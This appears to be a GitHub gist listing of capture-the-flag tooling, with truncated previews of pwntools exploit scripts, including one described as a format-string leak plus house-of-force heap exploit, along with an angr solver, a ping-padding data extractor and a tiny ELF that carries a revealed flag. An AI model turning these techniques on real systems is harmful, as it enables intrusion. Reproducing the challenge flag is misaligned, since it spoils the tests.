wumb0 wumb0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '''asm console via keystone for python 2.7 | |
| pip install keystone-engine | |
| python asmconsole.py -a ARM -m LITTLE_ENDIAN -f escape -b 0x000086e4 | |
| Little endian arm print escape codes and make base address 0x000086e4 | |
| ''' | |
| from __future__ import print_function | |
| import keystone | |
| import argparse | |
| from sys import exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 32 | |
| ; flag: RC3-2016-YEAH-DATS-BETTER-BOII | |
| ; based on http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html | |
| org 0x08048000 | |
| ehdr: | |
| db "FLAG" ; e_ident | |
| db 1, 1, 1, 0, 0 | |
| _start: mov ecx,promptsize | |
| jmp main | |
| dw 2 ; e_type |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from time import sleep | |
| import numpy as np | |
| ''' | |
| this is a format string leak combined with house of force heap exploitation. | |
| You control the amount of memory allocated. So allocating very little space, | |
| then a lot (calculated), then again will allow you to get a pointer to read/write | |
| anywhere you want! | |
| Steps: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from libformatstr import FormatStr | |
| context.log_level = 'info' | |
| e = ELF("./greeting") | |
| if args.get('REMOTE'): | |
| r = remote('pwn2.chal.ctf.westerns.tokyo', 16317, timeout=10) | |
| else: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from time import sleep | |
| e = ELF('./dat-boinary') | |
| libc = ELF(args.get('LIBC', './libc.so.6')) | |
| if args.get('REMOTE'): | |
| r = remote("problems.ctfx.io", 1337) | |
| else: | |
| r = process(e.path) |
wumb0
/ col_solve.py
Last active
March 16, 2017 21:06
angr solver for the collision challenge of pwnable.kr
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from angr import Project, surveyors | |
| from sys import exit | |
| import claripy | |
| '''vars | |
| pstr: where the dynamic input will be stored in the state | |
| phcode: the address of hash to collide with (the program loads the correct hash from this address) | |
| find: the address we want the path explorer to find (the "you win" address) | |
| retn: the simulation starts in a function called from main (check_password) but the 'find' address is in main so I need a place to return |
wumb0
/ extract_pingdata.py
Created
July 13, 2016 19:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| import sys | |
| import base64 | |
| # script to extract data from ping padding (http://wumb0.in/ping-exfil.html) | |
| try: | |
| config.conf.iface = sys.argv[2] | |
| except: pass |
NewerOlder